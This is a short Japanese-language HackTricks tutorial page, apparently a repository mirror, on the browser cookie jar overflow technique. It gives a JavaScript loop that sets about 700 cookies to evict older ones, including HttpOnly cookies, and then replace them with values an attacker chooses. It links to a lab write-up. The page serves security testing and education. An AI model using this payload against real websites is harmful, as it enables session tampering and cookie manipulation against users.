mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
23 lines
1.2 KiB
Markdown
23 lines
1.2 KiB
Markdown
{{#include ../../banners/hacktricks-training.md}}
|
|
|
|
ブラウザには、ページごとに保存できる**クッキーの数の制限**があります。したがって、何らかの理由で**クッキーを消す必要がある**場合、**クッキージャーをオーバーフロー**させることができます。そうすれば、最も古いクッキーが削除されます。
|
|
```javascript
|
|
// Set many cookies
|
|
for (let i = 0; i < 700; i++) {
|
|
document.cookie = `cookie${i}=${i}; Secure`
|
|
}
|
|
|
|
// Remove all cookies
|
|
for (let i = 0; i < 700; i++) {
|
|
document.cookie = `cookie${i}=${i};expires=Thu, 01 Jan 1970 00:00:01 GMT`
|
|
}
|
|
```
|
|
注意してください。異なるドメインを指すサードパーティのクッキーは上書きされません。
|
|
|
|
> [!CAUTION]
|
|
> この攻撃は、**HttpOnlyクッキーを上書きするためにも使用でき、削除してから希望の値でリセットすることができます**。
|
|
>
|
|
> これを[**このラボの投稿で確認してください**](https://www.sjoerdlangkemper.nl/2020/05/27/overwriting-httponly-cookies-from-javascript-using-cookie-jar-overflow/)。
|
|
|
|
{{#include ../../banners/hacktricks-training.md}}
|